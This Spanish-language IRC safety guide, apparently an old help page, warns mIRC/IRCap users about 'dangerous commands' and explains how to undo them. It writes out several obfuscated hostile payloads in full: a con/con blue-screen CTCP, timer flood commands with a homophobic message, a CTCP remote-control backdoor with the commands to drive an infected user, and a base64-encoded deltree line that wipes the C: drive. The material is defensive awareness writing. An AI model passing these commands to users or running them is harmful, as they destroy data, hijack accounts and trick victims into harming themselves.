COMANDOS PELIGROSOS:

Los podemos dividir en 2 categorías: Comandos que escribe el atacante y comandos que escribe la víctima. Contra los primeros sólo podemos protegernos manteniendo actualizado nuestro sistema. Contra los segundos, lo tenemos mucho más sencillo: No escribir jamás ningún comando cuya acción desconozcamos.

a) Comandos que escribe el atacante:



**** Con/Con **** -= Pantallazo Azul =-

- Este comando aprovecha un fallo del kernel de windows, el cual, produce el comúnmente conocido como " Pantallazo Azul " y nos hace reiniciar el ordenador, o meterle tres patadas ( sobre gustos no hay nada escrito ).

- Este es el comando para un canal entero:

/ctcp #canal sound \IFS$HLP$\IFS$HLP$\IFS$HLP$.mp3


- Este es para una sola persona:

/ctcp #canal nick sound \IFS$HLP$\IFS$HLP$\IFS$HLP$.mp3


-¿Cómo evitarlo?

-Bajándonos los parches de actulización de la página:

-Si usamos Win95 -> http://www.microsoft.com/downloads/release.asp?releaseID=19491

-Si usamos Win98 -> http://www.microsoft.com/downloads/release.asp?ReleaseID=19389

-Si usamos ircap podemos bajarnos también el parche contra el con/con de la página:

http://www.ircap.net


**** Sacar IP's **** -= !seen nick =-

-Da pocos resultados, pero a veces funciona y da la ip o dns del nick víctima.

-¿Cómo evitarlo?

Desactivando en nuestro script el comando !seen. Para ello escribimos:

/disable #seen

 


b) Comandos que escribe la víctima:

**** Timer **** -= Soy gay! =-

-Comando poco peligroso, pero sí molesto y pesado. Aparte de ponernos en ridículo, nos puede hacer desconectarnos del irc por excess flood.

- Lo que hace al ejecutarse es activar un timer o temporizador que repite en bucle (siempre lo mismo). El más típico es tunick soy gay, (aunque el texto puede ser cualquiera) en todos los canales en los que estes.

-Algunas de las variantes de éste comando son las siguientes:

//t $+ $chr(105) $+ $chr(109) $+ er 0 1 $chr(97) $+ $chr(109) $+ S $+ $chr(103) $chr(115)) $+ o $+ $chr(121) $chr(103) $+ $chr(97) $+ $chr(121)

/timer 0 1 //$left(ameipmask,3) $left(esirc,2) $left(Generated,1) $+ $right(getipay,2)


-
Resultado del comando:

<tunick> soy gay
<tunick> soy gay
<tunick> soy gay
<tunick> soy gay
<tunick> soy gay
<tunick> soy gay
<tunick> soy gay
<tunick> soy gay
<tunick> soy gay
<tunick> soy gay
<tunick> soy gay
<tunick> soy gay

(Así hasta que te caes por excess flood).

-¿Cómo evitarlo?

-La mejor forma es evidente, no escribiendo comandos cuya acción desconozcamos.

-Si ya lo hemos escrito, tenemos que fijarnos en lo que pone al ejecutar la sentencia:

Si pone: * Timer loquesea activated

Tenemos que escribir: /timerloquesea off (timerloquesea todo junto).

Por ejemplo, Si pone * Timer 1 activated

Tenemos que escribir: /timer1 off

-Si no nos da tiempo a pararlo, sólo hay que cerrar el script, y luego volverlo a abrir, entrar a los canales en los que estabamos y explicar quee tu hermano pequeño o amigo te pilló el teclado y lo puso (casi nuca te creerán :DDDD )

 

**** _antispam **** -= Ataca _antispam !! =-

- Este comando hace enfadar mucho al bot que se encarga de la publicidad no permitida en las redes llamado _antispam.

-Su modus operandi es muy simple, al poner el comando en pleno canal, donde se encuentre el bot, todos esos caracteres se decodifican (traducen al cristiano) y forman la frase: www.sexoduro.com, con lo cual el bot te engancha y te pone un g-line, sin que puedas volver a conectarte a esa red en un buen ratito.

//$decode(bXNnIF9hbnRpc3BhbSB3d3cuc2V4b2R1cm8uY29t,m)

- Existen más variaciones de éste código, que nos hacen decir: www.jodiendo.com , www.sexogratis.com, etc... no os fieis y pongais cosas que no sabeis para que son; os pueden estar tomando el pelo.


**** Ctcp's **** -= Remote Control =-

- Este comando es igual que un troyano, pero en version IRC. Permite a cualquiera manejarte a voluntad como si fueras un bot, pudiendo hablar por ti, enviar dccs, banear o dar @ a alguien, etc...

- El modo de infeccion es el mismo que los anteriores. Te llega un individuo y te camela para que pongas el comando con fines diversos como veremos a continuación.

- El principio del comando es el señuelo o engaño, puesto que puede ser muy distinto, según nos digan que lo pongamos para obtener @ en todos los canales, para que no nos puedan banear, etc, etc.

- //echo -a opme #canal tunick <--- esto es el principio del comando que como vereis se puede cambiar para persuadiros de que lo pongais, diciendo, en este caso que obtendreis @ en un determinado canal . Si lo poneis vereis quee solo decis: opme #canal tunick ,donde #canal puede ser ummmm #Malaga y tunick pepe. Seria asi el comienzo del comando ---> opme #Malaga pepe ..............

-Este es el comando completo (ya hemos dicho que el comienzo puede variar).

//echo -a opme #canal nick | $mid(au-writer,4,5) $mid(badabc,3,3) $+ $chr(46) $+ $mid(allintxt,6,3) $mid(CTC-org,1,3) $+ $chr(80) $str(*:,3) $chr(36) $+ $mid(1-2=3,1,2) $chr(124) $mid(scotty-haltty,8,4) | $chr(46) $+ $mid(loader-client,1,4) $mid(q-rstu,2,3) $mid(badabc,3,3) $+ $chr(46) $+ $mid(alltxt,4,3)

- Como podeis observar es extremadamente largo, pero se ha abreviado y reducido a multitud de tamaños.

- ¿Como se controla a un infectado ?

-Mediante ctcp's: /ctcp nickvictima //msg #canal mensaje

Traducción: /ctcp pepe //msg #malaga eres mi esclavo :DDDD

La opcion msg se puede cambiar por deop nickx (quita la @ al nickx), op nickx (da @ al nickx) etc...

- ¿Como saber quien me controla ?

-Fácil, nos vamos a estado y miramos los ctcps puesto que te controlan mediante ellos.

Veriamos: Ctcp nickmalvado y la orden que nos ha enviado hacer.


-¿Cómo evitarlo?

- Si “por casualidad” llegaseis a poner ese comando, el modo de desinfección es fácil. Al poner el comando se crea un documento con el nombre dab.txt en la carpeta C:\mIRC (esto varia segun los scripts), en cuyo interior se puede ver algo asi:

CTCP *:*:*: $1- | halt

-Con borrar ése archivo, cerrar el script y volverlo a abrir estaremos limpios otra vez.

 

//say $ip -= Dime tu ip =-

-Escribiendo éste comando

//say $ip

Darás tu ip a todo el canal donde lo escribas



**** Deltree **** -= Formateo de disco =-

-ATENCIÓN: MUY PELIGROSO

- Este comando funciona en windows 95 y 98. Al introducirlo hace una ejecución de ciertos archivos del sistema que originan algo similar a un format c: (nos borra el disco duro!!!).

//$decode(L3J1biAtbiBcd2lvZG93c1xjb21tYW5kXGR1bHRyZXhlIC95IGM6XC4gPm51bA==,m)

-¿Cómo evitarlo?

Una vez más NO ESCRIBIENDO JAMÁS NINGÚN COMANDO QUE NO CONOZCAMOS

 

**** F4 **** -= ¡Que me caigo! =-

-No se trata propiamente de un comando, pero es una de las “novatadas” más extendidas en los canales de irc con los usuarios inexpertos. Consiste en convencer a la víctima (diciéndole que conseguirá @ por ejemplo), de que pulse la tecla de función F4, lo que provoca su desconexión del irc.

 

NOTA: TODOS LOS COMANDOS AQUI PRESENTES HAN SIDO PROBADOS EN EL SCRIPT IRCAP

LAS VERSIONES ACTUALIZADAS AVISAN DE QUE LO QUE ESTAS PONIENDO ES POSIBLE QUE SEA UN COMANDO MALIGNO

PARA EL MIRC 6.01 NO FUNCIONA NINGUN COMANDO, SOLO SI VA ACOMPAÑADO DEL IRCAP Y COMO DIJE ANTES, AVISA DE ELLO SI ES UNA VERSION ACTUAL.

LA MAYORIA DE COMANDOS NO FUNCIONAN EN LOS SCRIPTS ACTUALES ( ES IMPORTANTE ESTAR ACTUALIZADO )

 

volver